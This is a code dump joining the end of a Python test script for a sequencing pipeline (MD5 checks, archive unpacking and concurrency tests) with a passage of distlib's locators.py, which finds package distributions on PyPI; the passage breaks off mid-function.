'bs_abundance_52.tsv': '3a699c60147c4d55308f9a89ccd81c37',
'bs_abundance_53.tsv': 'ed71663caece1b8cb70c3a34980af07a',
'bs_abundance_54.tsv': 'a1e078adb75288e6511a738fd26aac11',
'bs_abundance_55.tsv': '39b0c66b8834147065ae50e92b71910f',
'bs_abundance_56.tsv': 'fb6c02ede906ee95c1fe8722d2c64e39',
'bs_abundance_57.tsv': '954b8e6b74bf5da93e8015a3adf499bc',
'bs_abundance_58.tsv': '88c06d7b7435730d6b173a7ad6e80027',
'bs_abundance_59.tsv': '9468f789071ae4f255de469acf01cf15',
'bs_abundance_6.tsv': 'fd6317422b1da424e0b7f776dc29f54e',
'bs_abundance_60.tsv': '7700cab0b26f3ad81c41a9c020d3213e',
'bs_abundance_61.tsv': '4cf82ff6233ed3a2496d1c3c2e421da3',
'bs_abundance_62.tsv': '7e04fa0ad67365bc18e3dace56db3d9e',
'bs_abundance_63.tsv': '671b8054884cf6aea652701ed5d99e4e',
'bs_abundance_64.tsv': '905a3e2022512f8edb7553af77833270',
'bs_abundance_65.tsv': 'cf2e8e27264b31426ef405a2183c1403',
'bs_abundance_66.tsv': 'd65741a01e1969f3f12884d8b6b34201',
'bs_abundance_67.tsv': 'c49f8010856327eb5a95fb37583daac9',
'bs_abundance_68.tsv': '10b83ae2d50be6d9d4e8dac9087b277f',
'bs_abundance_69.tsv': 'd51b5e56e968e976b69502dc4ea2a6cb',
'bs_abundance_7.tsv': '88edd50cb06592b4888104aac9cc71ff',
'bs_abundance_70.tsv': '06a20f14f33bb79625031c65c87ffeac',
'bs_abundance_71.tsv': '393dd8e009842cc60263b0c0b5c27bae',
'bs_abundance_72.tsv': 'c6effd347964890cff3424d389c84118',
'bs_abundance_73.tsv': 'd5e92c285952be755e362eb8ef57da75',
'bs_abundance_74.tsv': '4b677adf2c1562b287b9d11977faf06f',
'bs_abundance_75.tsv': '82f69f07084cdff2cbf62ec21d064fca',
'bs_abundance_76.tsv': '2c39741d7f16da49ffb48e39666ac025',
'bs_abundance_77.tsv': '27ea383329683911fe43774f1d03d146',
'bs_abundance_78.tsv': '77fe28b15c7d3778cc19a8fb04ef4185',
'bs_abundance_79.tsv': '13785b16fc4312816e909b1c50473f4f',
'bs_abundance_8.tsv': 'eca744e67f137aa23c1bc58cb2149a37',
'bs_abundance_80.tsv': 'c0f510bb96ad29ca192c72a2a696f335',
'bs_abundance_81.tsv': 'b9a4725319e47e74942e01e99352d707',
'bs_abundance_82.tsv': '63cabd75732856fb5fef84fe287d2417',
'bs_abundance_83.tsv': '811dd40341d8a9260e9dbcbf6a98d6b8',
'bs_abundance_84.tsv': 'a5be8d2c78ad597ca64af3f022dc5eda',
'bs_abundance_85.tsv': 'a18a28209a3f2a89dab22d04834657a8',
'bs_abundance_86.tsv': 'cf8641f470badc5d9f042f92462602a5',
'bs_abundance_87.tsv': '0b7317f5f4640fa3750a2cc220e5faae',
'bs_abundance_88.tsv': 'a95eefd9131f8f70873f938c301b0c16',
'bs_abundance_89.tsv': '3d881a72f9a4b8778f7d624e76c3c874',
'bs_abundance_9.tsv': 'ed5c275dc08529a9c0ddbf7030a77209',
'bs_abundance_90.tsv': '3f41e205cb8ecf63bc6f5c2469d75e7e',
'bs_abundance_91.tsv': 'b6a2133ac23eb060c71451748ab754d3',
'bs_abundance_92.tsv': '038b732a2179c1573f2c2fa4ad785daa',
'bs_abundance_93.tsv': '12e76d073f5d1b91ae9d21ebf40bd450',
'bs_abundance_94.tsv': 'b0be763b46da7fdaae99910377895582',
'bs_abundance_95.tsv': '9d3214afae1ae645eafe9bbfd6d80af3',
'bs_abundance_96.tsv': '4f9f43d88694acc7c353212527b3fde6',
'bs_abundance_97.tsv': '91fc42c6f1523431dae8b606e5d04920',
'bs_abundance_98.tsv': 'cab22fd16259a30b63fcae4caa032bbb',
'bs_abundance_99.tsv': 'fbca271c5ef039cb100d9f42620d27f9',
'run_info.json': '0035a7317254484ae13e4abbc94cc195'},
'wt2': {'abundance.h5': 'e232795f2976fd6d6664d8ab8c9538b1',
'abundance.tsv': 'b69782d52210778f8a9a0a816ce43844',
'bs_abundance_0.tsv': 'ed4894029dcfe76a646aeeab95843950',
'bs_abundance_1.tsv': '987d1c134478b0ef1d6506448e395c4e',
'bs_abundance_10.tsv': 'ff4614a4b1ca9caae165a19e88aaa267',
'bs_abundance_11.tsv': '4f5cf41b665fdb79790786dc5a497e18',
'bs_abundance_12.tsv': '20270c0212ae9eaad109fc2dc5872722',
'bs_abundance_13.tsv': '7946ad9f0c9046bc14008d521c52e689',
'bs_abundance_14.tsv': '0095a3db660828ed8a4c34cc9a5309f7',
'bs_abundance_15.tsv': '8fce133c733c4a43581b4282898db681',
'bs_abundance_16.tsv': 'd1c094d4054f0b90454b9b90839ad7c5',
'bs_abundance_17.tsv': 'f709588b588a99be3502677b35e9b2c9',
'bs_abundance_18.tsv': 'd81cf0139d8ceb7e1fff85a9cbc37609',
'bs_abundance_19.tsv': '5ac8c1ce44223000fe79a48c7df60c73',
'bs_abundance_2.tsv': 'eb67249119b99f27a28e1f291785d14b',
'bs_abundance_20.tsv': 'cb32d8d89b69340f0d5b9eb22e27db3b',
'bs_abundance_21.tsv': 'd373042c398e5015eda7d7ec310348fb',
'bs_abundance_22.tsv': '3d14fdd3921a3cb1c8bf21c3bb0d3b31',
'bs_abundance_23.tsv': 'b6b45b3f3d7977cab9dc1701852ff592',
'bs_abundance_24.tsv': '97384ac2bb272bbe2b1922b1aaf226fb',
'bs_abundance_25.tsv': '1eecc3c00f613078f032490b48dffc2e',
'bs_abundance_26.tsv': '6cfcbd608be62a59a375a8ac6aa59390',
'bs_abundance_27.tsv': '26b175c77e7b5af09f8e4a606c87d5d1',
'bs_abundance_28.tsv': '498de67366eed1a737379b8c1f257929',
'bs_abundance_29.tsv': '4c0f837a126bc337456a3029611ba031',
'bs_abundance_3.tsv': '98a0c4ab81f5848074a283f2eedb873c',
'bs_abundance_30.tsv': '9a28a38dd946a1ac9faaea36724ed09c',
'bs_abundance_31.tsv': 'f70b195934610cbe465b659a096e8b55',
'bs_abundance_32.tsv': 'f0561d89cedf474274c90f9bfeba0249',
'bs_abundance_33.tsv': '2cdd2803925658f76d1d2be355d7945e',
'bs_abundance_34.tsv': 'be019e8bb9e27873c6eaf8175c6ec207',
'bs_abundance_35.tsv': 'b4d0ebc436c63f18bd62eebc30b574d7',
'bs_abundance_36.tsv': 'c30f08d0897ee79aa1e2749817c5f0a8',
'bs_abundance_37.tsv': '6e7ccff28324de078d1e520abbcde663',
'bs_abundance_38.tsv': 'a018c8fd11c4f961be7b5e7519d2d962',
'bs_abundance_39.tsv': 'ed11c0eea19ddb50c46c5b521ba87250',
'bs_abundance_4.tsv': 'bc61d9ec794df6485ead6a524779f971',
'bs_abundance_40.tsv': '03c716d0fa7332bc64ca7bcf08c7e5d0',
'bs_abundance_41.tsv': 'b46068257fb113085fbc317bac7f41e3',
'bs_abundance_42.tsv': '032a399e837838175e123d46d08d64ad',
'bs_abundance_43.tsv': '70a0e9c95b681ff62c4dc10c9f6a5c15',
'bs_abundance_44.tsv': 'e9669160334ffa2d6647f6a52a807483',
'bs_abundance_45.tsv': 'af3d478835d4ea545cae011d61f30741',
'bs_abundance_46.tsv': '72d733ea8f39e71e0674332ce2bbddae',
'bs_abundance_47.tsv': 'f9d0a68be163da5babe834d1c93c2f83',
'bs_abundance_48.tsv': '684aa0c30b11db2c22682c3677b82c3e',
'bs_abundance_49.tsv': '76e50ba661471e87fa37fe5196bdfc94',
'bs_abundance_5.tsv': '6bd8872e70a406e20d49c9f1b213f888',
'bs_abundance_50.tsv': 'd596f108ff9e392510c1505eae843ee6',
'bs_abundance_51.tsv': '18545ba91700bf560b2b86bacc844b10',
'bs_abundance_52.tsv': 'd8d4d60382c5e86acf45954a08540dd9',
'bs_abundance_53.tsv': '244896eb6d87bd94497e81e6a8696e85',
'bs_abundance_54.tsv': 'b4a51f105162b0061f8ac5a8927bf5dd',
'bs_abundance_55.tsv': 'c2aa7b78f0cd2a4b50350c43b1de071d',
'bs_abundance_56.tsv': '33844b313fed41bfa47d40a7b193bdd3',
'bs_abundance_57.tsv': 'caec566444decb89212e405854c29a14',
'bs_abundance_58.tsv': '98ead4ccca5fcf286e82b199f6cb59a5',
'bs_abundance_59.tsv': '250d19d073623f6a8ac9282343db93b1',
'bs_abundance_6.tsv': '8e1e340b446ea3081057fc460f59d900',
'bs_abundance_60.tsv': '05a8f7e8b1b40bd24470a9b15a717c26',
'bs_abundance_61.tsv': '3ee1520b3e68a2924eb4ea2aa03f59c3',
'bs_abundance_62.tsv': 'c1166e4b4b049af8d5e0aab935b31175',
'bs_abundance_63.tsv': 'ea3280d17d0746a3e999cc2cc8efdd3d',
'bs_abundance_64.tsv': 'fdbb2b8fd40f346cb2f3c3349b986d09',
'bs_abundance_65.tsv': 'b09401de9864515f07740ff76337a702',
'bs_abundance_66.tsv': '6e08bc60fa7e1678255f6b531e95cefa',
'bs_abundance_67.tsv': 'd222ac0c6804ead152d43e4498ad5699',
'bs_abundance_68.tsv': '87a8ca3f518ceac065d0649a3d1d4c7f',
'bs_abundance_69.tsv': '700efa44598d2a57b5eac7e75d7a3e20',
'bs_abundance_7.tsv': '81c428347d44b17c3e1ff435d29bd6e9',
'bs_abundance_70.tsv': '37a56b19a1353c3c3ff987c8313fa987',
'bs_abundance_71.tsv': '324d4c7dc6fb60d6ea0457f531678599',
'bs_abundance_72.tsv': 'b14aafc7dc83d7e4c75aa15fdc647d58',
'bs_abundance_73.tsv': '2b89bc39dd9d897c83ba3c81449f31f8',
'bs_abundance_74.tsv': '3fc2a89cd099fee4cc449390d384cf29',
'bs_abundance_75.tsv': '6bf44b2885854061888bb364208b8402',
'bs_abundance_76.tsv': 'c67ec79159ba5945ab5181902d32b005',
'bs_abundance_77.tsv': '1397dedf00c6b6c41cfa38dcd801f2a1',
'bs_abundance_78.tsv': 'd808ce2dc0461a596c03517b67d79284',
'bs_abundance_79.tsv': 'e3f19a4161f755f7a460206a908dee87',
'bs_abundance_8.tsv': '34ad9d78ee95754ddea0ad6535dc1df6',
'bs_abundance_80.tsv': '31e6140be25d8c741d89680a5d563f72',
'bs_abundance_81.tsv': 'c3a429a42fbad7c0835663174dc4519d',
'bs_abundance_82.tsv': '6c3305a08bbc7060cbde7efb6c901e54',
'bs_abundance_83.tsv': 'cf6d4b0086f391900c03a5284e1a75c3',
'bs_abundance_84.tsv': 'df87fbf8958d7c892cf0a88fa03cef0d',
'bs_abundance_85.tsv': '36a23b4d1c5dcb84a07168d62374f4e5',
'bs_abundance_86.tsv': '43a9bc6d30ae73d747b3e2bf38ca6bcc',
'bs_abundance_87.tsv': 'ec998fd68ab3805916531231a737ce14',
'bs_abundance_88.tsv': 'bf4f1e021c6f7660963cd8a973b4ebff',
'bs_abundance_89.tsv': 'f5e319974878e6d38c5c2ce01f4e7256',
'bs_abundance_9.tsv': 'dc7e0105eb37fbea3ce33472913ce379',
'bs_abundance_90.tsv': 'a237b6e87348de02c5afc164e509e6d0',
'bs_abundance_91.tsv': 'af23e932f3d82e3d67afd1cebfb50a37',
'bs_abundance_92.tsv': '7e7465582f48f1079a137e3f17d5250b',
'bs_abundance_93.tsv': '97838e5495c7279ef48d1e2f7881079c',
'bs_abundance_94.tsv': '69bd3c162deed5676dd3d225a46f3307',
'bs_abundance_95.tsv': 'c3bae60f126c12a9ee151df939c1660d',
'bs_abundance_96.tsv': 'e11b4fbde94a9d64548aea8314ada51b',
'bs_abundance_97.tsv': '442605a6f7d25e71664c8b6c026321e0',
'bs_abundance_98.tsv': 'b607723410c2bed4eb002f33741053b5',
'bs_abundance_99.tsv': '54a1593945a6da7d3d37d6cb2614ec42',
'run_info.json': 'ad2ba0be4210ad8ab9238a4817bc0308'}
}
md5s_list = list(md5s['mt1'].values()) + list(md5s['mt2'].values()) + list(md5s['wt1'].values()) + list(md5s['wt2'].values())
new_md5s = {}
for root, dirs, files in os.walk('../../test_samples/aligned/'):
if files:
folder = root.split('/')[-1]
new_md5s[folder] = {}
for fname in files:
md5 = md5_chksum('{}/{}'.format(root, fname))
print('{}: {}'.format(fname, md5))
new_md5s[folder][fname] = md5
assert md5s == new_md5s, 'MD5s do not match those in record!'
for _id in ids:
for root, folders, files in os.walk('../../root/projects/{}/1_alignment'.format(_id)):
if len(folders) == 0:
for fname in files:
md5 = md5_chksum('{}/{}'.format(root, fname))
if md5 in md5s_list:
print('.', end='')
else:
print('\n{} not in list'.format(md5))
def read_quant(_id):
result = subprocess.check_output(['../../Request.sh', 'read_quant', '--id', _id])
result = result.decode('utf-8').strip()
return result
def copy_reads_folder(_id):
os.rmdir('../../root/projects/{}/0_raw_reads'.format(_id))
shutil.copytree('../../test_samples/raw/minimum', '../../root/projects/{}/0_raw_reads/'.format(_id))
def copy_reads_archive(_id):
shutil.copy2('../../test_samples/raw/minimum.tar.gz', '../../root/projects/{}/0_raw_reads/minimum.tar.gz'.format(_id))
def copy_reads_multiple(_id):
os.rmdir('../../root/projects/{}/0_raw_reads'.format(_id))
shutil.copytree('../../test_samples/raw/multiple', '../../root/projects/{}/0_raw_reads/'.format(_id))
def test_unpacking(testn):
md5s = {'18844_CCGTCC_L001_R1_001aa.fastq.gz': 'd4eb3295777b6556988f772158f6eaee',
'18844_CCGTCC_L001_R1_002aa.fastq.gz': 'be800e0e845f528aef13a2427db9c28c',
'18844_CCGTCC_L001_R1_003aa.fastq.gz': '71b355c1d54ac7c15513fca4a5d09dcc',
'18844_CCGTCC_L002_R1_001aa.fastq.gz': '6d13e0c1844339fcb73f6efd321435ba',
'18844_CCGTCC_L002_R1_002aa.fastq.gz': 'fb42a29875358fda7bc9a3fbb1b26db6',
'18844_CCGTCC_L002_R1_003aa.fastq.gz': '006e33f74303d076b0e0dcb6d0563352',
'18845_GTCCGC_L001_R1_001aa.fastq.gz': '2cd48438b23f51a2807dd8173d022dd6',
'18845_GTCCGC_L001_R1_002aa.fastq.gz': '6356c494452e44696c66436bd437f473',
'18845_GTCCGC_L001_R1_003aa.fastq.gz': '9797c44857a9ed9b9540d0fd87bbfdf2',
'18845_GTCCGC_L002_R1_001aa.fastq.gz': 'aacca6b59e419e9814985aa44a0c76bb',
'18845_GTCCGC_L002_R1_002aa.fastq.gz': '9395e721461d3bb91a9945bfe77c17d1',
'18845_GTCCGC_L002_R1_003aa.fastq.gz': '63ad9c405c181ea74bdaf78ec85f7ed6',
'18841_AGTCAA_L001_R1_001aa.fastq.gz': '1e84587cf4d07cf3f9945656765f50aa',
'18841_AGTCAA_L001_R1_002aa.fastq.gz': '34f2ee199d90250019cde457f7f3af3b',
'18841_AGTCAA_L001_R1_003aa.fastq.gz': 'cb9a4a1d4bd792d29a0d6d73834d83a4',
'18841_AGTCAA_L002_R1_001aa.fastq.gz': '2d9b1c464bfabcea7fd021f0e07c60f6',
'18841_AGTCAA_L002_R1_002aa.fastq.gz': '71b3aeb73a909292b7a65a9f2eea6131',
'18841_AGTCAA_L002_R1_003aa.fastq.gz': 'e7403dd5536d9acf71065fc5ef9c89b1',
'18842_AGTTCC_L001_R1_001aa.fastq.gz': '4467221cbd918be2c6799d3ecbd73113',
'18842_AGTTCC_L001_R1_002aa.fastq.gz': '3679701aab7ae4ffe55ad8203813b284',
'18842_AGTTCC_L001_R1_003aa.fastq.gz': '32eedc6587834a18005fa31984910217',
'18842_AGTTCC_L002_R1_001aa.fastq.gz': '11b0a8f6c0e1e78907ef5d9c1513d93a',
'18842_AGTTCC_L002_R1_002aa.fastq.gz': '811bf0c7dd01e13792285d4e82a57637',
'18842_AGTTCC_L002_R1_003aa.fastq.gz': 'dc0b307190a6edabafe890e90c811aec'}
# calculate md5s
new_md5s = {}
for root, dirs, files in os.walk('../../test_samples/raw/minimum'):
for fname in files:
md5 = md5_chksum('{}/{}'.format(root, fname))
print('{}: {}'.format(fname, md5))
new_md5s[fname] = md5
assert md5s == new_md5s, 'MD5s do not match those in record!'
print('***Start unarchiving test***')
projects = []
for i in range(testn):
print('**entire folder archived into one file {}***'.format(i))
projects.append(unpacking_sequence(lambda x : copy_reads_archive(x)))
for i in range(testn):
print('***unarchived & divided into folders {}***'.format(i))
projects.append(unpacking_sequence(lambda x : copy_reads_folder(x)))
for i in range(testn):
print('***multiple archives {}***'.format(i))
projects.append(unpacking_sequence(lambda x : copy_reads_multiple(x)))
return projects
def unpacking_sequence(copy):
_id = new_proj()
print('\tNew project: {}'.format(_id))
copy(_id)
print('\tInfer samples')
result = infer_samples(_id, md5s)
if result:
print('\t{} passed the test'.format(_id))
else:
print('\t{} failed the test'.format(_id))
return _id
def remove_proj(_id):
shutil.rmtree('../../root/projects/{}'.format(_id))
def test_concurrency(workern, testn):
def work(testn, qu):
for i in range(testn):
_id = new_proj()
print('.', end='', flush=True)
qu.put(_id)
print('***concurrency***')
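# Each worker thread creates `testn` projects and pushes the new ids onto a
# shared queue; the main thread then drains the queue and deletes every
# project, so this exercises concurrent new_proj() calls end to end.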
projects = queue.Queue()
threads = []
for i in range(workern):
t = Thread(target=work, args=(testn, projects,))
t.setDaemon(True)
threads.append(t)
for t in threads:
t.start()
for t in threads:
for i in range(testn):
remove_proj(projects.get())
print()
if __name__ == '__main__':
# testn = 10
# workern = 8
# test_concurrency(workern, testn)
# projects = test_unpacking(testn)
#
# for _id in projects:
# read_quant(_id)
wait = input("PRESS ENTER ONCE ALIGNMENTS ARE FINISHED.")
test_read_quant()
|
locators.py
|
# -*- coding: utf-8 -*-
#
# Copyright (C) 2012-2015 Vinay Sajip.
# Licensed to the Python Software Foundation under a contributor agreement.
# See LICENSE.txt and CONTRIBUTORS.txt.
#
import gzip
from io import BytesIO
import json
import logging
import os
import posixpath
import re
try:
import threading
except ImportError: # pragma: no cover
import dummy_threading as threading
import zlib
from . import DistlibException
from .compat import (urljoin, urlparse, urlunparse, url2pathname, pathname2url,
queue, quote, unescape, string_types, build_opener,
HTTPRedirectHandler as BaseRedirectHandler, text_type,
Request, HTTPError, URLError)
from .database import Distribution, DistributionPath, make_dist
from .metadata import Metadata, MetadataInvalidError
from .util import (cached_property, parse_credentials, ensure_slash,
split_filename, get_project_data, parse_requirement,
parse_name_and_version, ServerProxy, normalize_name)
from .version import get_scheme, UnsupportedVersionError
from .wheel import Wheel, is_compatible
logger = logging.getLogger(__name__)
logger.disabled = True
HASHER_HASH = re.compile(r'^(\w+)=([a-f0-9]+)')
CHARSET = re.compile(r';\s*charset\s*=\s*(.*)\s*$', re.I)
HTML_CONTENT_TYPE = re.compile('text/html|application/x(ht)?ml')
DEFAULT_INDEX = 'https://pypi.org/pypi'
def get_all_distribution_names(url=None):
"""
Return all distribution names known by an index.
:param url: The URL of the index.
:return: A list of all known distribution names.
"""
if url is None:
url = DEFAULT_INDEX
client = ServerProxy(url, timeout=3.0)
try:
return client.list_packages()
finally:
client('close')()
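# Illustrative usage sketch of get_all_distribution_names (an assumption: the
# index is reachable and still serves the XML-RPC list_packages call):
#
#     names = get_all_distribution_names()   # queries https://pypi.org/pypi
#     print(len(names), 'distributions known to the index')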
class RedirectHandler(BaseRedirectHandler):
"""
A class to work around a bug in some Python 3.2.x releases.
"""
# There's a bug in the base version for some 3.2.x
# (e.g. 3.2.2 on Ubuntu Oneiric). If a Location header
# returns e.g. /abc, it bails because it says the scheme ''
# is bogus, when actually it should use the request's
# URL for the scheme. See Python issue #13696.
def http_error_302(self, req, fp, code, msg, headers):
# Some servers (incorrectly) return multiple Location headers
# (so probably same goes for URI). Use first header.
newurl = None
for key in ('location', 'uri'):
if key in headers:
newurl = headers[key]
break
if newurl is None: # pragma: no cover
return
urlparts = urlparse(newurl)
if urlparts.scheme == '':
newurl = urljoin(req.get_full_url(), newurl)
if hasattr(headers, 'replace_header'):
headers.replace_header(key, newurl)
else:
headers[key] = newurl
return BaseRedirectHandler.http_error_302(self, req, fp, code, msg,
headers)
http_error_301 = http_error_303 = http_error_307 = http_error_302
class Locator(object):
"""
A base class for locators - things that locate distributions.
"""
source_extensions = ('.tar.gz', '.tar.bz2', '.tar', '.zip', '.tgz', '.tbz')
binary_extensions = ('.egg', '.exe', '.whl')
excluded_extensions = ('.pdf',)
# A list of tags indicating which wheels you want to match. The default
# value of None matches against the tags compatible with the running
# Python. If you want to match other values, set wheel_tags on a locator
# instance to a list of tuples (pyver, abi, arch) which you want to match.
wheel_tags = None
downloadable_extensions = source_extensions + ('.whl',)
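# Illustrative sketch of matching wheels for a target other than the running
# interpreter (the tag values below are assumptions, not defaults used by this
# module):
#
#     locator.wheel_tags = [('cp39', 'cp39', 'manylinux2014_x86_64'),
#                           ('py3', 'none', 'any')]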
def __init__(self, scheme='default'):
"""
Initialise an instance.
:param scheme: Because locators look for most recent versions, they
need to know the version scheme to use. This specifies
the current PEP-recommended scheme - use ``'legacy'``
if you need to support existing distributions on PyPI.
"""
self._cache = {}
self.scheme = scheme
# Because of bugs in some of the handlers on some of the platforms,
# we use our own opener rather than just using urlopen.
self.opener = build_opener(RedirectHandler())
# If get_project() is called from locate(), the matcher instance
# is set from the requirement passed to locate(). See issue #18 for
# why this can be useful to know.
self.matcher = None
self.errors = queue.Queue()
def get_errors(self):
"""
Return any errors which have occurred.
"""
result = []
while not self.errors.empty(): # pragma: no cover
try:
e = self.errors.get(False)
result.append(e)
except queue.Empty:
continue
self.errors.task_done()
return result
def clear_errors(self):
"""
Clear any errors which may have been logged.
"""
# Just get the errors and throw them away
self.get_errors()
def clear_cache(self):
self._cache.clear()
def _get_scheme(self):
return self._scheme
def _set_scheme(self, value):
self._scheme = value
scheme = property(_get_scheme, _set_scheme)
def _get_project(self, name):
"""
For a given project, get a dictionary mapping available versions to Distribution
instances.
This should be implemented in subclasses.
If called from a locate() request, self.matcher will be set to a
matcher for the requirement to satisfy, otherwise it will be None.
"""
raise NotImplementedError('Please implement in the subclass')
def get_distribution_names(self):
"""
Return all the distribution names known to this locator.
"""
raise NotImplementedError('Please implement in the subclass')
def get_project(self, name):
"""
For a given project, get a dictionary mapping available versions to Distribution
instances.
This calls _get_project to do all the work, and just implements a caching layer on top.
"""
if self._cache is None: # pragma: no cover
result = self._get_project(name)
elif name in self._cache:
result = self._cache[name]
else:
self.clear_errors()
result = self._get_project(name)
self._cache[name] = result
return result
def score_url(self, url):
"""
Give an url a score which can be used to choose preferred URLs
for a given project release.
"""
t = urlparse(url)
basename = posixpath.basename(t.path)
compatible = True
is_wheel = basename.endswith('.whl')
is_downloadable = basename.endswith(self.downloadable_extensions)
if is_wheel:
compatible = is_compatible(Wheel(basename), self.wheel_tags)
return (t.scheme == 'https', 'pypi.org' in t.netloc,
is_downloadable, is_wheel, compatible, basename)
def prefer_url(self, url1, url2):
"""
Choose one of two URLs where both are candidates for distribution
archives for the same version of a distribution (for example,
.tar.gz vs. zip).
The current implementation favours https:// URLs over http://, archives
from PyPI over those from other locations, wheel compatibility (if a
wheel) and then the archive name.
"""
result = url2
if url1:
s1 = self.score_url(url1)
s2 = self.score_url(url2)
if s1 > s2:
result = url1
if result != url2:
logger.debug('Not replacing %r with %r', url1, url2)
else:
logger.debug('Replacing %r with %r', url1, url2)
return result
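# Example of the resulting preference (a sketch; both URLs are hypothetical):
#
#     prefer_url('http://example.com/foo-1.0.zip',
#                'https://pypi.org/packages/source/f/foo/foo-1.0.tar.gz')
#
# returns the https:// PyPI URL, because score_url ranks scheme and host
# before the archive name.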
def split_filename(self, filename, project_name):
"""
Attempt to split a filename in project name, version and Python version.
"""
return split_filename(filename, project_name)
def convert_url_to_download_info(self, url, project_name):
"""
See if a URL is a candidate for a download URL for a project (the URL
has typically been scraped from an HTML page).
If it is, a dictionary is returned with keys "name", "version",
"filename" and "url"; otherwise, None is returned.
"""
def same_project(name1, name2):
return normalize_name(name1) == normalize_name(name2)
result = None
scheme, netloc, path, params, query, frag = urlparse(url)
if frag.lower().startswith('egg='): # pragma: no cover
logger.debug('%s: version hint in fragment: %r',
project_name, frag)
m = HASHER_HASH.match(frag)
if m:
algo, digest = m.groups()
else:
algo, digest = None, None
origpath = path
if path and path[-1] == '/': # pragma: no cover
path = path[:-1]
if path.endswith('.whl'):
try:
wheel = Wheel(path)
if not is_compatible(wheel, self.wheel_tags):
logger.debug('Wheel not compatible: %s', path)
else:
if project_name is None:
include = True
else:
include = same_project(wheel.name, project_name)
if include:
result = {
'name': wheel.name,
'version': wheel.version,
'filename': wheel.filename,
'url': urlunparse((scheme, netloc, origpath,
params, query, '')),
'python-version': ', '.join(
['.'.join(list(v[2:])) for v in wheel.pyver]),
}
except Exception as e: # pragma: no cover
logger.warning('invalid path for wheel: %s', path)
elif not path.endswith(self.downloadable_extensions): # pragma: no cover
logger.debug('Not downloadable: %s', path)
else: # downloadable extension
path = filename = posixpath.basename(path)
for ext in self.downloadable_extensions:
if path.endswith(ext):
path = path[:-len(ext)]
t = self.split_filename(path, project_name)
if not t: # pragma: no cover
logger.debug('No match for project/version: %s', path)
else:
name, version, pyver = t
if not project_name or same_project(project_name, name):
result = {
'name': name,
'version': version,
'filename': filename,
'url': urlunparse((scheme, netloc, origpath,
params, query, '')),
#'packagetype': 'sdist',
}
if pyver: # pragma: no cover
result['python-version'] = pyver
break
if result and algo:
result['%s_digest' % algo] = digest
return result
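# Rough illustration of the result for a plain sdist URL, called on a Locator
# instance (hypothetical URL; the exact fields depend on split_filename):
#
#     locator.convert_url_to_download_info(
#         'https://files.example.org/foo-1.0.tar.gz', 'foo')
#     -> {'name': 'foo', 'version': '1.0', 'filename': 'foo-1.0.tar.gz',
#         'url': 'https://files.example.org/foo-1.0.tar.gz'}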
def _get_digest(self, info):
"""
Get a digest from a dictionary by looking at a "digests" dictionary
or keys of the form 'algo_digest'.
Returns a 2-tuple (algo, digest) if found, else None. Currently
looks only for SHA256, then MD5.
"""
result = None
if 'digests' in info:
digests = info['digests']
for algo in ('sha256', 'md5'):
if algo in digests:
result = (algo, digests[algo])
break
if not result:
for algo in ('sha256', 'md5'):
key = '%s_digest' % algo
if key in info:
result = (algo, info[key])
break
return result
def _update_version_data(self, result, info):
"""
Update a result dictionary (the final result from _get_project) with a
dictionary for a specific version, which typically holds information
gleaned from a filename or URL for an archive for the distribution.
"""
name = info.pop('name')
version = info.pop('version')
if version in result:
dist = result[version]
md = dist.metadata
else:
dist = make_dist(name, version, scheme=self.scheme)
md = dist.metadata
dist.digest = digest = self._get_digest(info)
url = info['url']
result['digests'][url] = digest
if md.source_url != info['url']:
md.source_url = self.prefer_url(md.source_url, url)
result['urls'].setdefault(version, set()).add(url)
dist.locator = self
result[version] = dist
def locate(self, requirement, prereleases=False):
"""
Find the most recent distribution which matches the given
requirement.
:param requirement: A requirement of the form 'foo (1.0)' or perhaps
'foo (>= 1.0, < 2.0, != 1.3)'
:param prereleases: If ``True``, allow pre-release versions
to be located. Otherwise, pre-release versions
are not returned.
:return: A :class:`Distribution` instance, or ``None`` if no such
distribution could be located.
"""
result = None
r = parse_requirement(requirement)
if r is None: # pragma: no cover
raise DistlibException('Not a valid requirement: %r' % requirement)
scheme = get_scheme(self.scheme)
self.matcher = matcher = scheme.matcher(r.requirement)
logger.debug('matcher: %s (%s)', matcher, type(matcher).__name__)
versions = self.get_project(r.name)
if len(versions) > 2: # urls and digests keys are present
# sometimes, versions are invalid
slist = []
vcls = matcher.version_class
for k in versions:
if k in ('urls', 'digests'):
continue
try:
if not matcher.match(k):
logger.debug('%s did not match %r', matcher, k)
else:
if prereleases or not vcls(k).is_prerelease:
slist.append(k)
else:
logger.debug('skipping pre-release '
'version %s of %s', k, matcher.name)
except Exception: # pragma: no cover
logger.warning('error matching %s with %r', matcher, k)
pass # slist.append(k)
if len(slist) > 1:
slist = sorted(slist, key=scheme.key)
if slist:
logger.debug('sorted list: %s', slist)
version = slist[-1]
result = versions[version]
if result:
if r.extras:
result.extras = r.extras
result.download_urls = versions.get('urls', {}).get(version, set())
d = {}
sd = versions.get('digests', {})
for url in result.download_urls:
if url in sd: # pragma: no cover
d[url] = sd[url]
result.digests = d
self.matcher = None
return result
class PyPIRPCLocator(Locator):
"""
This locator uses XML-RPC to locate distributions. It therefore
cannot be used with simple mirrors (that only mirror file content).
"""
def __init__(self, url, **kwargs):
"""
Initialise an instance.
:param url: The URL to use for XML-RPC.
:param kwargs: Passed to the superclass constructor.
"""
super(PyPIRPCLocator, self).__init__(**kwargs)
self.base_url = url
self.client = ServerProxy(url, timeout=3.0)
def get_distribution_names(self):
"""
Return all the distribution names known to this locator.
"""
return set(self.client.list_packages())
def _get_project(self, name):
result = {'urls': {}, 'digests': {}}
versions = self.client.package_releases(name, True)
for v in versions:
urls = self.client.release_urls(name, v)
data = self.client.release_data(name, v)
metadata = Metadata(scheme=self.scheme)
metadata.name = data['name']
metadata.version = data['version']
metadata.license = data.get('license')
metadata.keywords = data.get('keywords', [])
metadata.summary = data.get('summary')
dist = Distribution(metadata)
if urls:
info = urls[0]
metadata.source_url = info['url']
dist.digest = self._get_digest(info)
dist.locator = self
result[v] = dist
for info in urls:
url = info['url']
digest = self._get_digest(info)
result['urls'].setdefault(v, set()).add(url)
result['digests'][url] = digest
return result
class PyPIJSONLocator(Locator):
"""
This locator uses PyPI's JSON interface. It's very limited in functionality
and probably not worth using.
"""
def __init__(self, url, **kwargs):
super(PyPIJSONLocator, self).__init__(**kwargs)
self.base_url = ensure_slash(url)
def get_distribution_names(self):
"""
Return all the distribution names known to this locator.
"""
raise NotImplementedError('Not available from this locator')
def _get_project(self, name):
result = {'urls': {}, 'digests': {}}
url = urljoin(self.base_url, '%s/json' % quote(name))
try:
resp = self.opener.open(url)
data = resp.read().decode() # for now
d = json.loads(data)
md = Metadata(scheme=self.scheme)
data = d['info']
md.name = data['name']
md.version = data['version']
